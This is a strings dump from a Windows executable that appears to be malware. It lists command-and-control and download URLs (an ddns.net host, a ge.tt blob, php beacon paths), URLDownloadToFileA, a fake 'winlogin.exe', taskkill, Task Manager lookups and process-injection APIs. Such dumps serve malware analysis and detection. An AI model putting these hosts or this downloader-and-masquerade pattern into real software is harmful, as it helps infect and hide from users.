.?AV_Generic_error_category@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AV_Iostream_error_category@std@@
.?AVlength_error@std@@
.?AV_Locimp@locale@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVruntime_error@std@@
.?AV_System_error_category@std@@
.?AVsystem_error@std@@
.?AV_System_error@std@@
.?AVtype_info@@
bad address
bad_address
bad allocation
bad cast
bad exception
bad file descriptor
bad_file_descriptor
bad locale name
bad message
 Base Class Array'
 Base Class Descriptor at (
__based(
<&<B<i<
broken pipe
bWWWWj
__cdecl
CD$HPj
?%?]?c?i?o?u?{?
 Class Hierarchy Descriptor'
CloseHandle
CloseThreadpoolTimer
CloseThreadpoolWait
__clrcall
cmd.exe
CompareStringEx
CompareStringW
 Complete Object Locator'
COMSPEC
\config.ini
config.ini
connection aborted
connection_aborted
connection already in progress
connection_already_in_progress
connection refused
connection_refused
connection reset
connection_reset
`copy constructor closure'
CopyFileA
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
CorExitProcess
/c.php?V=2&ID=
?C?P?U?c?
CreateDirectoryA
CreateDirectoryW
CreateEventExW
CreateFile2
CreateFileW
CreateMutexA
CreateProcessA
CreateSemaphoreExW
CreateSymbolicLinkW
CreateThread
CreateThreadpoolTimer
CreateThreadpoolWait
CreateToolhelp32Snapshot
cross device link
>Cu/f9F
C:\Users\MrUnzO\documents\visual studio 2013\Projects\ConsoleApplication3\Release\ConsoleApplication3.pdb
C:\Windows\system32\cmd.exe - 
D$0SVW
D$'9D$ 
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
`default constructor closure'
 delete
 delete[]
DeleteCriticalSection
DeleteFileW
destination address required
destination_address_required
device or resource busy
:(:D:h:
:[;@<D<H<L<P<T<X<\<`<d<h<l<p<t<
<$<<<D<h<x<
directory not empty
<"<(<:<D<J<e<u<~<
="=D=K=
:,;D;k;p;v;
D$ SVW
D$(SVW
`dynamic atexit destructor for '
`dynamic initializer for '
__eabi
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
empty distance tree with lengths
EncodePointer
EnterCriticalSection
EnumChildWindows
EnumSystemLocalesEx
EnumSystemLocalesW
>!?,?e?q?
?E?Q?b?g?
executable format error
ExitProcess
__fastcall
February
file exists
filename too long
filename_too_long
file too large
FindClose
FindFirstFileA
FindNextFileA
FindWindowA
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FlushProcessWriteBuffers
FreeEnvironmentStringsW
FreeLibraryWhenCallbackReturns
Friday
function not supported
G0Pj.S
G4Pj/S
G8PjDS
GDPjGS
GdPjOS
generic
GetACP
GetActiveWindow
GetClassNameA
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetConsoleWindow
GetCPInfo
GetCurrentDirectoryW
GetCurrentPackageId
GetCurrentProcess
GetCurrentProcessId
GetCurrentProcessorNumber
GetCurrentThreadId
GetDateFormatEx
GetEnvironmentStringsW
GetExitCodeProcess
GetFileAttributesExW
GetFileAttributesW
GetFileInformationByHandleExW
GetFileType
GetLastActivePopup
GetLastError
GetLastInputInfo
GetLocaleInfoEx
GetLocaleInfoW
GetLogicalProcessorInformation
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleExW
GetModuleHandleW
GetOEMCP
GetPrivateProfileIntA
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoW
GetStdHandle
GetStringTypeW
GetSystemDirectoryA
GetSystemTimeAsFileTime
GetTickCount
GetTickCount64
GetTimeFormatEx
GetUserDefaultLCID
GetUserDefaultLocaleName
GetUserObjectInformationW
GetWindowTextA
GetWindowThreadProcessId
GhPj8S
GHPjHS
GlPj9S
GLPjIS
G<PjES
G@PjFS
G\PjMS
G`PjNS
G|Pj=S
G Pj*S
G,Pj-S
G(Pj,S
G$Pj+S
GPPjJS
GpPj:S
GTPjKS
GtPj;S
GXPjLS
GxPj<S
`h````
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
`h`hhh
HH:mm:ss
host unreachable
host_unreachable
Ht+Ht$Ht
http://ge.tt/api/1/files/7ZgNjE32/0/blob?download
http://h4ck3r4k3.ddns.net
http://H4CK3R.INFO
_hypot
identifier removed
illegal byte sequence
inappropriate io control operation
incomplete distance tree
incomplete dynamic bit lengths tree
incomplete literal/length tree
incorrect data check
incorrect header check
InitializeCriticalSectionAndSpinCount
InitializeCriticalSectionEx
interrupted
invalid argument
invalid_argument
invalid bit length repeat
invalid block type
invalid distance code
invalid literal/length code
invalid seek
invalid stored block lengths
invalid string position
invalid window size
io error
ios_base::badbit set
ios_base::eofbit set
ios_base::failbit set
iostream
iostream stream error
is a directory
IsDebuggerPresent
IsProcessorFeaturePresent
IsValidCodePage
IsValidLocale
IsValidLocaleName
jA[jZZ+
JanFebMarAprMayJunJulAugSepOctNovDec
January
jAZjZ^
j"_f9y
j@j _W
j	PjYV
KERNEL32.dll
l0p0t0x0|0
LCMapStringEx
LCMapStringW
LeaveCriticalSection
=L>m>r>
LoadLibraryA
LoadLibraryExW
LocalFileTimeToFileTime
Local\$myprogram$
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
MessageBoxW
message size
message_size
MM/dd/yy
Monday
MultiByteToWideChar
=M>Y>&?
need dictionary
network down
network_down
network reset
network_reset
network unreachable
network_unreachable
 new[]
_nextafter
)N\)N|
no buffer space
no_buffer_space
no child process
no link
no lock available
no message
no message available
no protocol option
no_protocol_option
no space on device
no stream resources
no such device
no such device or address
no such file or directory
no such process
not a directory
not a socket
not_a_socket
not a stream
not connected
not_connected
not enough memory
not supported
November
(null)
October
`omni callsig'
OpenProcess
operation canceled
operation in progress
operation_in_progress
operation not permitted
operation not supported
operation_not_supported
operation would block
operation_would_block
operator
OutputDebugStringW
oversubscribed distance tree
oversubscribed dynamic bit lengths tree
oversubscribed literal/length tree
owner dead
=]=p={=
__pascal
permission denied
permission_denied
~pjCXf
`placement delete closure'
`placement delete[] closure'
PP9E u
PPPPPPPP
Process32First
Process32Next
Processes
protocol error
protocol not supported
protocol_not_supported
PSSSSV
__ptr64
PWWWWV
Qkkbal
QQSVWd
QQSVWh
QRicha	
QueryPerformanceCounter
RaiseException
randll32.exe
`.rdata
ReadConsoleW
ReadFile
read only file system
ReadProcessMemory
RegCloseKey
RegCreateKeyExW
RegSetValueExW
@.reloc
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
      <requestedPrivileges>
resource deadlock would occur
Resource Monitor
resource unavailable try again
__restrict
restrict(
result out of range
RtlUnwind
RVSQSWV
s(9C4u
Saturday
`scalar deleting destructor'
    </security>
    <security>
SendMessageA
September
SetCurrentDirectoryA
SetDefaultDllDirectories
SetEndOfFile
SetEnvironmentVariableA
SetFileInformationByHandleW
SetFilePointer
SetFilePointerEx
SetFileTime
SetLastError
SetStdHandle
SetThreadpoolTimer
SetThreadpoolWait
SetThreadStackGuarantee
SetUnhandledExceptionFilter
SHELL32.dll
SHGetSpecialFolderPathA
ShowWindow
:$:S:[:l:
state not recoverable
__stdcall
stream timeout
`string'
string too long
Sunday
SunMonTueWedThuFriSat
SVjA[jZ^+
,SVWj0X
SVWjA_jZ+
SysListView32
system
SystemRoot
SystemTimeToFileTime
?!???T?^?
~';_t|%3
t&9=$MC
=t=A>~>
taskkill /IM 
Task Manager
_tcPVj@
TerminateProcess
text file busy
+t"HHt
tHHt*Ht#
__thiscall
!This program cannot be run in DOS mode.
Thursday
timed out
timed_out
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
too many files open
too_many_files_open
too many files open in system
too many length or distance symbols
too many links
too many symbolic link levels
  </trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
Tuesday
;t$,v-
t WW9}
 Type Descriptor'
`typeof'
tyPVj@W
uBjAYjZ+
`udt returning'
uHjAXf;
<\u#j\W
u#j,Xf;
__unaligned
UnhandledExceptionFilter
UNICODE
unknown compression method
unknown error
Unknown exception
 unzip 0.15 Copyright 1998 Gilles Vollant 
\update.zip
update.zip
UQPXY]Y[
URLDownloadToFileA
urlmon.dll
URLMON.DLL
URPQQh
USER32.dll
UTF-16LE
ux;s,u
<v5h2SC
value too large
`vbase destructor'
`vbtable'
`vcall'
__vectorcall
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
version
\version
VERSION
[VERSION]
VERSION = 1;
`vftable'
VirtualAllocEx
`virtual displacement map'
VirtualFreeEx
v	N+D$
WaitForSingleObject
WaitForThreadpoolTimerCallbacks
Wednesday
WideCharToMultiByte
\Windows
Windows Task Manager
\winlogin.exe
winlogin.exe
Wj0XPV
WriteConsoleW
WriteFile
WritePrivateProfileStringA
WriteProcessMemory
wrong protocol type
wrong_protocol_type
wsprintfW
< <*<X<f<n<w<
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
/x.php?ID=
xppwpp
xpxxxx
>'>X>x>
Yu2Vj@h
YYhXrB